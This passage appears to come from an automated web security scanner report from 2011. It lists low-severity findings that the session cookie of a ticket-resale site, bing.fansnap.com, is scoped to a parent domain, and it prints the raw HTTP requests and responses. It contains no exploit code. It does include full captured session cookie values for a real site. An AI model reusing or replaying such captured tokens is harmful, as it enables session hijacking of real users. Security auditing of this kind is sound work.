OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DD05uNBjoLb2Zmc2V0af6QnQ%3D%3D--3f60618cc7127ee74d521a0ea1c28b136222eb4a

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 18:35:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 92
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B0YQSOBjoLb2Zmc2V0af6QnQ%3D%3D--cad52d757f88a1ee393908a1cef9017cb8688093; domain=fansnap.com; path=/; HttpOnly
Location: http://rover.ebay.com/rover/1/711-53200-19255-0/1?type=2&campid=5336216552&customid=1061888771&item=120749940240&ext=120749940240
Status: 302
Vary: Accept-Encoding
Content-Length: 211
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?type=2&amp;campid=5336216552&amp;customid=1061888771&amp;item=120749940240&amp;ext=120749940240">redirected</a>.</b
...[SNIP]...

13.4. http://bing.fansnap.com/checkout/clickout/418563179  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/clickout/418563179

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/clickout/418563179?quantity=2&ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AlY%2BiNBjoLb2Zmc2V0af6QnQ%3D%3D--188d6189626cb7901a210ce5a69621d12fd463f4

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 74
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4A2rVCRBjoLb2Zmc2V0af6QnQ%3D%3D--28ac37f50b283343a71eb70a2f9c612588bd7793; domain=fansnap.com; path=/; HttpOnly
Location: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=65260005
Status: 302
Vary: Accept-Encoding
Content-Length: 171
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://www.stubhub.com/?ticket_id=303237644&amp;GCID=C12289x970&amp;quantity_selected=2&amp;gtkw=65260005">redirected</a>.</body></html>

13.5. http://bing.fansnap.com/checkout/index/415814268  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "912210bf9f97f8eae912bcb4828410b5"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BH%2FkqNBjoLb2Zmc2V0af6QnQ%3D%3D--976c30f9ab045a1cfd33499b88aa515a33432d71; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11824
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...

13.6. http://bing.fansnap.com/checkout/index/418563179  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 22
ETag: "a77815d5d483b7d39d35206e9af3772a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CWdhqOBjoLb2Zmc2V0af6QnQ%3D%3D--8f0f6d1603aea2d08c675430159ed90f71b0f19d; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11810
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...

13.7. http://bing.fansnap.com/la/pi  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /la/pi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgstickets%7C%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%26_ctx%3D%26_ts%3D1311100420%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fwww.bing.com%252Fevents%252Fsearch%253Fq%253DU2%252Bwith%252BInterpol%252B%2528rescheduled%252Bfrom%252B7%25252f19%2529%2526p1%253D%255BEvents%252520source%253D%252522vertical%252522%252Bqzeventid%253D%252522f389669%252522%255D%2526FORM%253DDTPEVE HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BLXYWGBjoLb2Zmc2V0af6QnQ%3D%3D--512a0ae45b8038b810373fbf6aa82948b14c77d0; POOLID=B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Content-Disposition: inline; filename="ra.gif"
Content-Transfer-Encoding: binary
Cache-Control: private
X-Runtime: 11
ETag: "db04c7b378cb2db912c3ba8a5a774ee3"
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Ds26SGBjoLb2Zmc2V0af6QnQ%3D%3D--ce90378291811242432536859c5946b358b7b028; domain=fansnap.com; path=/; HttpOnly
Content-Length: 43
Status: 200
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.8. http://bing.fansnap.com/la/seats-uet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /la/seats-uet

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /la/seats-uet?m=_uid%3D-776896836%3A7925%3Apgstickets%26_ctx%3Dmt%3Aint%3Bsz%3A1254%3Bid%3A389669%26_cnt%3D1%26_st%3D%26ts%3D1311100477222%26ev%3Dsection-hover%3B89185%26ev%3Dsection-hover%3B89267%26ts%3D1311100478810%26&ch=bing HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
